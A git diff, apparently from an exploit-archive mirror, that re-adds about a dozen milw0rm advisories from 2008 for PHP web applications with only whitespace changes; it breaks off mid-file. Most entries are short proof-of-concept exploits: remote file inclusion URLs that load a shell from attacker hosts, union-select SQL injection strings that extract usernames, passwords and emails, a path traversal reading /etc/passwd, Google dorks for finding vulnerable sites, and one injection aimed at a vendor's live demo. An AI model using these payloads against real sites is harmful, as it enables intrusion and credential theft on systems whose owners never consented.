-____________________   ___ ___ ________
-\_   _____/\_   ___ \ /   |   \\_____  \  
- |    __)_ /    \  \//    ~    \/   |   \ 
- |        \\     \___\    Y    /    |    \
-/_______  / \______  /\___|_  /\_______  /
-        \/         \/       \/         \/ 
-
-                                        .OR.ID
-ECHO_ADV_101$2008
-
------------------------------------------------------------------------------------------
-[ECHO_ADV_101$2008] Attachmax Dolphin <= 2.1.0 Multiple Vulnerability
------------------------------------------------------------------------------------------
-
-Author       : K-159
-Date         : September, 16 th 2008
-Location     : Jakarta, Indonesia
-Web          : http://e-rdc.org/v1/news.php?readmore=108
-Critical Lvl : High
-Impact       : System access
-Where        : From Remote
----------------------------------------------------------------------------
-
-Affected software description:
-~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Application : Attachmax Dolphin
-version     : <= 2.1.0
-Vendor      : http://www.attachmax.com/
-Description :
-
-Attachmax allows you to run your very own youtube Video Community site, just like popular Videos sites
-such as youtube, dailymotion and revver. Additionally Attachmax includes the ability for Images and Files,
-following the trend of other popular File Sharing communities such as Imageshack and Rapidshare. 
-So not only do you get a fully functional Video Script, but a complete File Sharing Website.
-
----------------------------------------------------------------------------
-
-Vulnerability:
-~~~~~~~~~~~~~
-
-1. Remote File Inclusion Vulnerability
-
-Input passed to the "rel_path" parameter in config.php page is not properly verified before being used 
-to include files.This can be exploited to include arbitrary files from local or external resources.
-Successful exploitation requires that "register_globals" is enabled.
-
-
-Poc/Exploit:
-~~~~~~~~~
-http://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil?
-
-
-2. File info disclosure Vulnerability
-
-File info.php in main folder not protected to see directly from browser and could allow an attacker 
-to obtain sensitive information from the server.
-
-Poc:
-~~~
-http://www.example.com/[path]/info.php
-
-
-3. Blind SQL Injection Vulnerability.
-
-Input passed to the "category" parameter in search.php page is not properly verified before being used 
-in an sql query.
-This can be exploited thru the browser to manipulate SQL queries and pull the username and password
-from users in plain text.
-
-Poc/Exploit:
-~~~~~~~~~~~
-http://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]
-
-
-
-Dork:
-~~~~
-Google : "2007 Attachmax" or inurl:"controller.php?page=profile"
-
-
-Solution:
-~~~~~~
-
-- Edit the source code to ensure that input is properly verified.
-- Turn off register_globals in php.ini
-- Rename info.php.
-
-Timeline:
-~~~~~~~~
-
-- 24 - 08 - 2008 bug found
-- 02 - 09 - 2008 vendor contacted
-- 16 - 09 - 2008 advisory released
----------------------------------------------------------------------------
-
-Shoutz:
-~~~~
-~ "Happy 5th Anniversary" for ECHO.
-~ ping - my dearest wife, zautha - my beloved son, and my beloved next children.
-~ "Happy Wedding" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
-the_hydra,neng chika, str0ke
-~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
-~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra
-~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b
-~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
-kuntua, stev_manado,nofry,k1tk4t,0pt1c
-~ newbie_hacker@yahoogroups.com
-~ macaholic.info, unitiga.com, mac.web.id
-~ #aikmel #e-c-h-o @irc.dal.net
-
----------------------------------------------------------------------------
-Contact:
-~~~~~
-
-K-159 || echo|staff || adv[at]e-rdc[dot]org
-Homepage: http://www.e-rdc.org/
-
--------------------------------- [ EOF ] ---------------------------------- 
-
-# milw0rm.com [2008-09-16]
+____________________   ___ ___ ________
+\_   _____/\_   ___ \ /   |   \\_____  \  
+ |    __)_ /    \  \//    ~    \/   |   \ 
+ |        \\     \___\    Y    /    |    \
+/_______  / \______  /\___|_  /\_______  /
+        \/         \/       \/         \/ 
+
+                                        .OR.ID
+ECHO_ADV_101$2008
+
+-----------------------------------------------------------------------------------------
+[ECHO_ADV_101$2008] Attachmax Dolphin <= 2.1.0 Multiple Vulnerability
+-----------------------------------------------------------------------------------------
+
+Author       : K-159
+Date         : September, 16 th 2008
+Location     : Jakarta, Indonesia
+Web          : http://e-rdc.org/v1/news.php?readmore=108
+Critical Lvl : High
+Impact       : System access
+Where        : From Remote
+---------------------------------------------------------------------------
+
+Affected software description:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Application : Attachmax Dolphin
+version     : <= 2.1.0
+Vendor      : http://www.attachmax.com/
+Description :
+
+Attachmax allows you to run your very own youtube Video Community site, just like popular Videos sites
+such as youtube, dailymotion and revver. Additionally Attachmax includes the ability for Images and Files,
+following the trend of other popular File Sharing communities such as Imageshack and Rapidshare. 
+So not only do you get a fully functional Video Script, but a complete File Sharing Website.
+
+---------------------------------------------------------------------------
+
+Vulnerability:
+~~~~~~~~~~~~~
+
+1. Remote File Inclusion Vulnerability
+
+Input passed to the "rel_path" parameter in config.php page is not properly verified before being used 
+to include files.This can be exploited to include arbitrary files from local or external resources.
+Successful exploitation requires that "register_globals" is enabled.
+
+
+Poc/Exploit:
+~~~~~~~~~
+http://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil?
+
+
+2. File info disclosure Vulnerability
+
+File info.php in main folder not protected to see directly from browser and could allow an attacker 
+to obtain sensitive information from the server.
+
+Poc:
+~~~
+http://www.example.com/[path]/info.php
+
+
+3. Blind SQL Injection Vulnerability.
+
+Input passed to the "category" parameter in search.php page is not properly verified before being used 
+in an sql query.
+This can be exploited thru the browser to manipulate SQL queries and pull the username and password
+from users in plain text.
+
+Poc/Exploit:
+~~~~~~~~~~~
+http://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]
+
+
+
+Dork:
+~~~~
+Google : "2007 Attachmax" or inurl:"controller.php?page=profile"
+
+
+Solution:
+~~~~~~
+
+- Edit the source code to ensure that input is properly verified.
+- Turn off register_globals in php.ini
+- Rename info.php.
+
+Timeline:
+~~~~~~~~
+
+- 24 - 08 - 2008 bug found
+- 02 - 09 - 2008 vendor contacted
+- 16 - 09 - 2008 advisory released
+---------------------------------------------------------------------------
+
+Shoutz:
+~~~~
+~ "Happy 5th Anniversary" for ECHO.
+~ ping - my dearest wife, zautha - my beloved son, and my beloved next children.
+~ "Happy Wedding" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
+the_hydra,neng chika, str0ke
+~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
+~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra
+~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b
+~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
+kuntua, stev_manado,nofry,k1tk4t,0pt1c
+~ newbie_hacker@yahoogroups.com
+~ macaholic.info, unitiga.com, mac.web.id
+~ #aikmel #e-c-h-o @irc.dal.net
+
+---------------------------------------------------------------------------
+Contact:
+~~~~~
+
+K-159 || echo|staff || adv[at]e-rdc[dot]org
+Homepage: http://www.e-rdc.org/
+
+-------------------------------- [ EOF ] ---------------------------------- 
+
+# milw0rm.com [2008-09-16]
diff --git a/platforms/php/webapps/6469.txt b/platforms/php/webapps/6469.txt
index ddc55a9e0..1944f7896 100755
--- a/platforms/php/webapps/6469.txt
+++ b/platforms/php/webapps/6469.txt
@@ -1,45 +1,45 @@
-###########################################################
-# 
-#        ___    __ __                  __  __            
-#       /\_ \  /\ \\ \                /\ \/\ \           
-#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
-#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
-# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
-# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
-#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
-# 
-#                                 security breakd0wn!
-###########################################################
-# 
-# Title: Gonafish LinksCaffePRO 4.5 (index.php) SQL Injection Vulnerability
-# Vendor: http://gonafish.com/
-# Vulnerable Version: 4.5
-# Fix: N/A
-# 
-###########################################################
-# 
-# disc0vered: sl4xUz
-# c0ntact: sl4x.xuz[at]gmail[dot]com
-# d0rk: "negative"
-# stop lammo
-# 
-###########################################################
-
-######################
-  1. Information
-######################
-     LinksCaffePRO is a MySQL database driven link indexing script written in PHP 4. Using the admin script you have full control to add/modify/remove any link(s) or categorie(s).
-
-######################
-  2. Vulnerabilities
-######################
-     SQL Injection in "index.php" in the "idd" parameter.
-
-######################
-  3. PoC
-######################
-     http://localhost/path/index.php?action=deadlink&idd=-1+union+select+1,2,version(),4,concat(user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
-
-###########################################################
-
-# milw0rm.com [2008-09-16]
+###########################################################
+# 
+#        ___    __ __                  __  __            
+#       /\_ \  /\ \\ \                /\ \/\ \           
+#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
+#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
+# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
+# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
+#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
+# 
+#                                 security breakd0wn!
+###########################################################
+# 
+# Title: Gonafish LinksCaffePRO 4.5 (index.php) SQL Injection Vulnerability
+# Vendor: http://gonafish.com/
+# Vulnerable Version: 4.5
+# Fix: N/A
+# 
+###########################################################
+# 
+# disc0vered: sl4xUz
+# c0ntact: sl4x.xuz[at]gmail[dot]com
+# d0rk: "negative"
+# stop lammo
+# 
+###########################################################
+
+######################
+  1. Information
+######################
+     LinksCaffePRO is a MySQL database driven link indexing script written in PHP 4. Using the admin script you have full control to add/modify/remove any link(s) or categorie(s).
+
+######################
+  2. Vulnerabilities
+######################
+     SQL Injection in "index.php" in the "idd" parameter.
+
+######################
+  3. PoC
+######################
+     http://localhost/path/index.php?action=deadlink&idd=-1+union+select+1,2,version(),4,concat(user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
+
+###########################################################
+
+# milw0rm.com [2008-09-16]
diff --git a/platforms/php/webapps/647.pl b/platforms/php/webapps/647.pl
index e2f372e5a..ea04d3000 100755
--- a/platforms/php/webapps/647.pl
+++ b/platforms/php/webapps/647.pl
@@ -139,6 +139,6 @@ if ($answer =~ /^_START_/) { $on = 1; }
 print "[-] EXPLOIT FAILED\r\n";
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 
-### EOF ###
-
-# milw0rm.com [2004-11-22]
+### EOF ###
+
+# milw0rm.com [2004-11-22]
diff --git a/platforms/php/webapps/6473.txt b/platforms/php/webapps/6473.txt
index 273e5d52a..cca823bde 100755
--- a/platforms/php/webapps/6473.txt
+++ b/platforms/php/webapps/6473.txt
@@ -1,36 +1,36 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-phpRealty <= 0.03 (INC) Remote File Inclusion Vulnerability
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-$ Script: phpRealty
-$ Version: <= 0.03
-$ File affected: manager/static/view.php
-$ Download: http://sourceforge.net/project/showfiles.php?group_id=204745
-
-
-Found by ka0x 
-D.O.M Labs - Security Researchers
-- www.domlabs.org
-
-
-vuln code:
-
--------------
-
-11:	if(!isset($_GET['propID']) || !is_numeric($_GET['propID']) || empty($_GET['propID'])){
-13:	return;
-
-
-17:	include($INC."curr_conv.class.php");   // -------->>> Vuln Line!!
-                                          // the var $INC isn't declared
-
--------------
-
-
-Proof of Concept:
-http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC= [ S H E L L ] ?
-
-
-__EOF__
-
-# milw0rm.com [2008-09-17]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+phpRealty <= 0.03 (INC) Remote File Inclusion Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+$ Script: phpRealty
+$ Version: <= 0.03
+$ File affected: manager/static/view.php
+$ Download: http://sourceforge.net/project/showfiles.php?group_id=204745
+
+
+Found by ka0x 
+D.O.M Labs - Security Researchers
+- www.domlabs.org
+
+
+vuln code:
+
+-------------
+
+11:	if(!isset($_GET['propID']) || !is_numeric($_GET['propID']) || empty($_GET['propID'])){
+13:	return;
+
+
+17:	include($INC."curr_conv.class.php");   // -------->>> Vuln Line!!
+                                          // the var $INC isn't declared
+
+-------------
+
+
+Proof of Concept:
+http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC= [ S H E L L ] ?
+
+
+__EOF__
+
+# milw0rm.com [2008-09-17]
diff --git a/platforms/php/webapps/6475.txt b/platforms/php/webapps/6475.txt
index 0a28201f9..08965854f 100755
--- a/platforms/php/webapps/6475.txt
+++ b/platforms/php/webapps/6475.txt
@@ -1,24 +1,24 @@
-################## Piker #######################################
-#
-#
-#    PHP-Crawler v0.8 Remote File Inclusion Vulnerability
-#
-#
-#    Affected software: PHP-Crawler 0.8
-#    Vendor: http://sourceforge.net/projects/php-crawler/
-#    Risk: Critical
-#
-################################################################
-#
-#    http://[target]/[path]/footer.php?footer_file=[SHELL]
-#
-################################################################
-#
-#         Found by Piker [piker0x90(at)gmail(dot)com]
-#            D.O.M Labs - Security Researchers
-#           www.domlabs.org
-#
-#
-################################################################
-
-# milw0rm.com [2008-09-17]
+################## Piker #######################################
+#
+#
+#    PHP-Crawler v0.8 Remote File Inclusion Vulnerability
+#
+#
+#    Affected software: PHP-Crawler 0.8
+#    Vendor: http://sourceforge.net/projects/php-crawler/
+#    Risk: Critical
+#
+################################################################
+#
+#    http://[target]/[path]/footer.php?footer_file=[SHELL]
+#
+################################################################
+#
+#         Found by Piker [piker0x90(at)gmail(dot)com]
+#            D.O.M Labs - Security Researchers
+#           www.domlabs.org
+#
+#
+################################################################
+
+# milw0rm.com [2008-09-17]
diff --git a/platforms/php/webapps/6478.txt b/platforms/php/webapps/6478.txt
index 1113d375e..c31a99960 100755
--- a/platforms/php/webapps/6478.txt
+++ b/platforms/php/webapps/6478.txt
@@ -1,14 +1,14 @@
-#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
-#-----------Technote 7 Remote File Inclusion------------------------#
-# ----------developers site: http://www.technote.co.kr--------------#
-
-bash-3.1# cat technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php
-
-...snip...
-$TWIN_SET['dir_path']= "$shop_this_skin_path/3_plugin_twindow/skin_gray";
-...snip...
-include_once "$TWIN_SET[dir_path]/frame_design.php";
-
-http://site/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ip.a.dd.r/shell.php?
-
-# milw0rm.com [2008-09-17]
+#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
+#-----------Technote 7 Remote File Inclusion------------------------#
+# ----------developers site: http://www.technote.co.kr--------------#
+
+bash-3.1# cat technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php
+
+...snip...
+$TWIN_SET['dir_path']= "$shop_this_skin_path/3_plugin_twindow/skin_gray";
+...snip...
+include_once "$TWIN_SET[dir_path]/frame_design.php";
+
+http://site/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ip.a.dd.r/shell.php?
+
+# milw0rm.com [2008-09-17]
diff --git a/platforms/php/webapps/6480.txt b/platforms/php/webapps/6480.txt
index 7df555cd4..62e5069bf 100755
--- a/platforms/php/webapps/6480.txt
+++ b/platforms/php/webapps/6480.txt
@@ -1,33 +1,33 @@
-################## THUNDER #########################################################
-#
-#
-#    X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability
-#
-#    Founded by : THUNDER 
-#    Dork: "This search engine is in no way intended for illegal downloads."
-#
-##### Vuln Code: ###################################################################
-#
-# file : /includes/function_core.php
-#  -88.- include ($web_root."js/Mp3Player.php");
-#
-#-----------------------------------------------------------------
-#
-# file : /templates/layout_lyrics.php
-#  .5.- include ($web_root."includes/function_list.php");
-#
-###### Exploit #####################################################################
-#
-#   http://www.target.com/[path]/includes/function_core.php?web_root=http://127.0.0.1/r57.txt?
-#
-#   http://www.target.com/[path]/templates/layout_lyrics.php?web_root=http://127.0.0.1/r57.txt?           
-#         
-#
-#
-###### Greets #######################################################################
-#
-#   MoRoCcan InjEctor5 Te4m and All Hackers
-#
-####################################################################################
-
-# milw0rm.com [2008-09-17]
+################## THUNDER #########################################################
+#
+#
+#    X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability
+#
+#    Founded by : THUNDER 
+#    Dork: "This search engine is in no way intended for illegal downloads."
+#
+##### Vuln Code: ###################################################################
+#
+# file : /includes/function_core.php
+#  -88.- include ($web_root."js/Mp3Player.php");
+#
+#-----------------------------------------------------------------
+#
+# file : /templates/layout_lyrics.php
+#  .5.- include ($web_root."includes/function_list.php");
+#
+###### Exploit #####################################################################
+#
+#   http://www.target.com/[path]/includes/function_core.php?web_root=http://127.0.0.1/r57.txt?
+#
+#   http://www.target.com/[path]/templates/layout_lyrics.php?web_root=http://127.0.0.1/r57.txt?           
+#         
+#
+#
+###### Greets #######################################################################
+#
+#   MoRoCcan InjEctor5 Te4m and All Hackers
+#
+####################################################################################
+
+# milw0rm.com [2008-09-17]
diff --git a/platforms/php/webapps/6482.txt b/platforms/php/webapps/6482.txt
index e9581892c..3743343f6 100755
--- a/platforms/php/webapps/6482.txt
+++ b/platforms/php/webapps/6482.txt
@@ -1,46 +1,46 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-addalink <= 4 - beta / Write approved links without a previous moderation by the admin
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-$ Program: addalink
-$ Version: <= 4 - beta
-$ File affected: add_link.php
-$ Download: http://sourceforge.net/projects/addalink/
-
-
-Found by Pepelux 
-eNYe-Sec - www.enye-sec.org
-
-Linklist is a miniwebsite that you can use in your webpage. Basically it 
-manages a database of links using PHP+MySQL. Users can send links (url, 
-description, etc) by a form and one admin has to approve or delete the 
-links before the publication in the website.
-
-One not very important problem is that add_link.php doesn't test the 
-method used (GET or POST). But the real problem is the method to insert 
-some values. 
-
-Reading the code you can see the SQL sentence:
-
-INSERT INTO $linktable VALUES('0','$url','$linkname','$approved=0','$email',
-            '$counter=0','$description','$ip','$date','$category_id','0')";
-
-It asign values to approved and counter directly in the SQL sentence. For that,
-you can enter links approved without moderation writing this:
-
-http://domain/add_link.php?url=http://www.domain.com&linkname=name_of_the_link
-&approved=1&email=my@email.com&description=blablablablablablabla&category_id=1
-
-Also you can alter the counter of visits if you add &counter=XXXX to the GET
-
-
--= Solution =-
-
-
-$approved = 0;
-$counter = 0;
-
-INSERT INTO $linktable VALUES('0','$url','$linkname','$approved','$email',
-            '$counter','$description','$ip','$date','$category_id','0')";
-
-# milw0rm.com [2008-09-17]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+addalink <= 4 - beta / Write approved links without a previous moderation by the admin
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+$ Program: addalink
+$ Version: <= 4 - beta
+$ File affected: add_link.php
+$ Download: http://sourceforge.net/projects/addalink/
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+Linklist is a miniwebsite that you can use in your webpage. Basically it 
+manages a database of links using PHP+MySQL. Users can send links (url, 
+description, etc) by a form and one admin has to approve or delete the 
+links before the publication in the website.
+
+One not very important problem is that add_link.php doesn't test the 
+method used (GET or POST). But the real problem is the method to insert 
+some values. 
+
+Reading the code you can see the SQL sentence:
+
+INSERT INTO $linktable VALUES('0','$url','$linkname','$approved=0','$email',
+            '$counter=0','$description','$ip','$date','$category_id','0')";
+
+It asign values to approved and counter directly in the SQL sentence. For that,
+you can enter links approved without moderation writing this:
+
+http://domain/add_link.php?url=http://www.domain.com&linkname=name_of_the_link
+&approved=1&email=my@email.com&description=blablablablablablabla&category_id=1
+
+Also you can alter the counter of visits if you add &counter=XXXX to the GET
+
+
+-= Solution =-
+
+
+$approved = 0;
+$counter = 0;
+
+INSERT INTO $linktable VALUES('0','$url','$linkname','$approved','$email',
+            '$counter','$description','$ip','$date','$category_id','0')";
+
+# milw0rm.com [2008-09-17]
diff --git a/platforms/php/webapps/6483.txt b/platforms/php/webapps/6483.txt
index 2a4cad37e..a0ba0b97f 100755
--- a/platforms/php/webapps/6483.txt
+++ b/platforms/php/webapps/6483.txt
@@ -1,25 +1,25 @@
-############################################################
-############# E-Php Content Management System ######################
-## HaCker_Egy ;
-## Contact : hacker_egy@hotmail.com
-## Home : pal-hacker.com & atsdp.com
-===============================================
-# Script :  E-Php Content Management System
-# Download : http://www.ephpscripts.com
-===============================================
-# Exploit :
-           ==>> www.target.com/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*
-         
-     ==>> www.target.com/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*
-    
-# live Demo :
-             
-    ==>> http://www.ephpscripts.com/demo/cms/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*
-   
-## Note : use your mind to get Full exploit D: 
-   
-===============================================================
-## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , stack ,Mohamed el arab
-===============================================================
-
-# milw0rm.com [2008-09-18]
+############################################################
+############# E-Php Content Management System ######################
+## HaCker_Egy ;
+## Contact : hacker_egy@hotmail.com
+## Home : pal-hacker.com & atsdp.com
+===============================================
+# Script :  E-Php Content Management System
+# Download : http://www.ephpscripts.com
+===============================================
+# Exploit :
+           ==>> www.target.com/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*
+         
+     ==>> www.target.com/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*
+    
+# live Demo :
+             
+    ==>> http://www.ephpscripts.com/demo/cms/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*
+   
+## Note : use your mind to get Full exploit D: 
+   
+===============================================================
+## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , stack ,Mohamed el arab
+===============================================================
+
+# milw0rm.com [2008-09-18]
diff --git a/platforms/php/webapps/6485.txt b/platforms/php/webapps/6485.txt
index 83f548aa0..39f6dea96 100755
--- a/platforms/php/webapps/6485.txt
+++ b/platforms/php/webapps/6485.txt
@@ -1,42 +1,42 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-Add a link <= 4 - beta || Remote SQL Injection Vulnerability
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-/ Script: Add a link
-/ Version: <= 4 - beta
-/ File affected: user_read_links.php
-/ Download: http://sourceforge.net/projects/addalink/
-/ need magic_quotes_gpc = Off
-
-
-Found by ka0x 
-D.O.M Labs - Security Researchers
-- www.domlabs.org
-
-
-Vuln Code:
---------------
-
-32:  $read_out_linktable="SELECT * FROM $linktable WHERE approved='1' AND category_id='$category_id' ORDER BY id DESC LIMIT $start,$steps";
-33:  $read_result=mysql_query($read_out_linktable);
-
-....
-
-87:  while($data=mysql_fetch_array($read_result))
-88:  {
-90:      echo "";
-91:  }
-
---------------
-
-The var $category_id isn't verified.
-
-
-Proof of Concept:
-
-http://[host]/[addalink-path]/user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable/*
-
-
-__EOF__
-
-# milw0rm.com [2008-09-18]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Add a link <= 4 - beta || Remote SQL Injection Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+/ Script: Add a link
+/ Version: <= 4 - beta
+/ File affected: user_read_links.php
+/ Download: http://sourceforge.net/projects/addalink/
+/ need magic_quotes_gpc = Off
+
+
+Found by ka0x 
+D.O.M Labs - Security Researchers
+- www.domlabs.org
+
+
+Vuln Code:
+--------------
+
+32:  $read_out_linktable="SELECT * FROM $linktable WHERE approved='1' AND category_id='$category_id' ORDER BY id DESC LIMIT $start,$steps";
+33:  $read_result=mysql_query($read_out_linktable);
+
+....
+
+87:  while($data=mysql_fetch_array($read_result))
+88:  {
+90:      echo "";
+91:  }
+
+--------------
+
+The var $category_id isn't verified.
+
+
+Proof of Concept:
+
+http://[host]/[addalink-path]/user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable/*
+
+
+__EOF__
+
+# milw0rm.com [2008-09-18]
diff --git a/platforms/php/webapps/6486.txt b/platforms/php/webapps/6486.txt
index 4c20c9328..d8745a585 100755
--- a/platforms/php/webapps/6486.txt
+++ b/platforms/php/webapps/6486.txt
@@ -1,35 +1,35 @@
-             /************************************************************************/
-             /*                                                                      */
-             /*                          ProArcadeScript v1.3                        */
-             /*                                                                      */
-             /*                   Remote SQL Injection Vulnerability                 */
-             /*                                                                      */
-             /*                                                                      */
-             /************************************************************************/
-             /                                                                        /
-
-
- [~]AUTHOR          : SuNHouSe2 [ALGERIAN HaCkEr]
-
- [~]HOME            : http://www.snakespc.com                    
-
- [~]VERSION         : Tested on >>> ProArcadeScript v1.3
-
- [~]BUY SCRIPT      : http://www.proarcadescript.com  >>> Price : 59.01 USD
-
- [~]EXPLOIT         : 
-
-                     http://127.0.0.1/?random=-2 UNION SELECT 1,2,3,concat(username,char(58),password,char(58),email),5+FROM+pas_users--
-
-                
-
-                             /////////////////////////////////////////////////////////////////////////////////////
-            
-                            ////////        Special ThanX : His0k4,& ALL Snakespc.com Members       ////////////
-                           ////////          << GOOD RAMADANE FOR ALL MUSLIMS In THE World >>      ////////////
-
-                          ////////////////////////////////////////////////////////////////////////////////////
-                                        
-                                               -=-=-=-= SuNHouSe2@yahoo.com =-=-=-
-
-# milw0rm.com [2008-09-18]
+             /************************************************************************/
+             /*                                                                      */
+             /*                          ProArcadeScript v1.3                        */
+             /*                                                                      */
+             /*                   Remote SQL Injection Vulnerability                 */
+             /*                                                                      */
+             /*                                                                      */
+             /************************************************************************/
+             /                                                                        /
+
+
+ [~]AUTHOR          : SuNHouSe2 [ALGERIAN HaCkEr]
+
+ [~]HOME            : http://www.snakespc.com                    
+
+ [~]VERSION         : Tested on >>> ProArcadeScript v1.3
+
+ [~]BUY SCRIPT      : http://www.proarcadescript.com  >>> Price : 59.01 USD
+
+ [~]EXPLOIT         : 
+
+                     http://127.0.0.1/?random=-2 UNION SELECT 1,2,3,concat(username,char(58),password,char(58),email),5+FROM+pas_users--
+
+                
+
+                             /////////////////////////////////////////////////////////////////////////////////////
+            
+                            ////////        Special ThanX : His0k4,& ALL Snakespc.com Members       ////////////
+                           ////////          << GOOD RAMADANE FOR ALL MUSLIMS In THE World >>      ////////////
+
+                          ////////////////////////////////////////////////////////////////////////////////////
+                                        
+                                               -=-=-=-= SuNHouSe2@yahoo.com =-=-=-
+
+# milw0rm.com [2008-09-18]
diff --git a/platforms/php/webapps/6487.txt b/platforms/php/webapps/6487.txt
index 5b5c786d7..9491a0e8e 100755
--- a/platforms/php/webapps/6487.txt
+++ b/platforms/php/webapps/6487.txt
@@ -1,31 +1,31 @@
-This vulnerability leads to that the attacker can read any file on your webserver when it installs cyask.
-
-The $neturl variable in collect.php is short of enough check. When the attacker registers a new user, he can pass 
-the user check and then submit any filename to $neturl so that collect.php can read it.
-
-The vuln code like this:
-$url=get_referer();
-    $neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
-  
-    $collect_url=empty($neturl) ? $url : $neturl;
-  
-    $contents = '';
-    if($fid=@fopen($collect_url,"r"))
-    {
-        do
-        {
-            $data = fread($fid, 4096);
-            if (strlen($data) == 0)
-            {
-                break;
-            }
-            $contents .= $data;
-        }
-        while(true);
-        fclose($fid);
-    }
-
-POC:
-http://XXX.com/collect.php?neturl=../../../etc/passwd
-
-# milw0rm.com [2008-09-18]
+This vulnerability leads to that the attacker can read any file on your webserver when it installs cyask.
+
+The $neturl variable in collect.php is short of enough check. When the attacker registers a new user, he can pass 
+the user check and then submit any filename to $neturl so that collect.php can read it.
+
+The vuln code like this:
+$url=get_referer();
+    $neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
+  
+    $collect_url=empty($neturl) ? $url : $neturl;
+  
+    $contents = '';
+    if($fid=@fopen($collect_url,"r"))
+    {
